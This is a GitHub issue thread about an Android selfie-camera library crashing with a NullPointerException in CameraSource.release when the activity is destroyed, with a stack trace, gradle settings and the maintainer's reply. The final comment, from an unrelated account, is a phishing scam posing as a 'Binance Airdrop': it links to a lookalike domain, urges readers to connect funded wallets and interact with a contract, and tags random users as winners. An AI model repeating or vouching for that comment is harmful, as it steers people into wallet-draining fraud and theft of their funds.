### ISSUE TITLE
Unable to destroy activity

### ISSUE THREAD

**Issue by tahirghani9** [nmhung/Selfie-Camera-With-Face-Detection#1]
Facing this crash on Oppo F9 with android 10.

java.lang.RuntimeException: Unable to destroy activity {com.my.package/net.fitken.mlselfiecamera.selfie.SelfieActivity}: java.lang.NullPointerException: Attempt to invoke virtual method 'java.lang.Thread$State java.lang.Thread.getState()' on a null object reference
        at android.app.ActivityThread.performDestroyActivity(ActivityThread.java:5298)
        at android.app.ActivityThread.handleDestroyActivity(ActivityThread.java:5327)
        at android.app.servertransaction.DestroyActivityItem.execute(DestroyActivityItem.java:44)
        at android.app.servertransaction.TransactionExecutor.executeLifecycleState(TransactionExecutor.java:181)
        at android.app.servertransaction.TransactionExecutor.execute(TransactionExecutor.java:102)
        at android.app.ActivityThread$H.handleMessage(ActivityThread.java:2239)
        at android.os.Handler.dispatchMessage(Handler.java:107)
        at android.os.Looper.loop(Looper.java:237)
        at android.app.ActivityThread.main(ActivityThread.java:7830)
        at java.lang.reflect.Method.invoke(Native Method)
        at com.android.internal.os.RuntimeInit$MethodAndArgsCaller.run(RuntimeInit.java:492)
        at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:1040)
     Caused by: java.lang.NullPointerException: Attempt to invoke virtual method 'java.lang.Thread$State java.lang.Thread.getState()' on a null object reference
        at net.fitken.mlselfiecamera.camera.CameraSource$FrameProcessingRunnable.release(CameraSource.java:637)
        at net.fitken.mlselfiecamera.camera.CameraSource.release(CameraSource.java:153)
        at net.fitken.mlselfiecamera.selfie.SelfieActivity.onDestroy(SelfieActivity.kt:137)
        at android.app.Activity.performDestroy(Activity.java:8254)
        at android.app.Instrumentation.callActivityOnDestroy(Instrumentation.java:1341)
        at android.app.ActivityThread.performDestroyActivity(ActivityThread.java:5283)
        at android.app.ActivityThread.handleDestroyActivity(ActivityThread.java:5327) 
        at android.app.servertransaction.DestroyActivityItem.execute(DestroyActivityItem.java:44) 
        at android.app.servertransaction.TransactionExecutor.executeLifecycleState(TransactionExecutor.java:181) 
        at android.app.servertransaction.TransactionExecutor.execute(TransactionExecutor.java:102) 
        at android.app.ActivityThread$H.handleMessage(ActivityThread.java:2239) 
        at android.os.Handler.dispatchMessage(Handler.java:107) 
        at android.os.Looper.loop(Looper.java:237) 
        at android.app.ActivityThread.main(ActivityThread.java:7830) 
        at java.lang.reflect.Method.invoke(Native Method) 
        at com.android.internal.os.RuntimeInit$MethodAndArgsCaller.run(RuntimeInit.java:492) 
        at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:1040)

**Comment by tahirghani9** [comment]
to recreate this issue, update your project level gradle to as:

classpath 'com.android.tools.build:gradle:4.1.3'

and update your app level gradle as 

implementation fileTree(dir: 'libs', include: ['*.jar'])
    implementation "org.jetbrains.kotlin:kotlin-stdlib-jdk7:1.4.10"
    implementation 'androidx.appcompat:appcompat:1.2.0'
    implementation 'androidx.core:core-ktx:1.3.2'
    implementation 'androidx.constraintlayout:constraintlayout:2.0.4'
    testImplementation 'junit:junit:4.13.2'
    androidTestImplementation 'androidx.test.ext:junit:1.1.2'
    androidTestImplementation 'androidx.test.espresso:espresso-core:3.3.0'
    implementation 'de.hdodenhof:circleimageview:3.1.0'
//    implementation project(':mlselfiecamera')
    implementation 'net.fitken:mlselfiecamera:0.1.2'

**Comment by nmhung** [comment]
Hi @tahirghani9,

Thank you for using my small library.
Currently, I'm too busy to check on this. I think you can add the library as a module like above ("mlselfiecamera") and then you can modify it to make it work. 

Thank you again.
I'll look into this when I have time.

**Comment by karmalntest** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @tomershvueli, @PatrickLaabs, @matheuscuba, @ljshwyykl, @MSylvia, @hoangpq, @kenken64
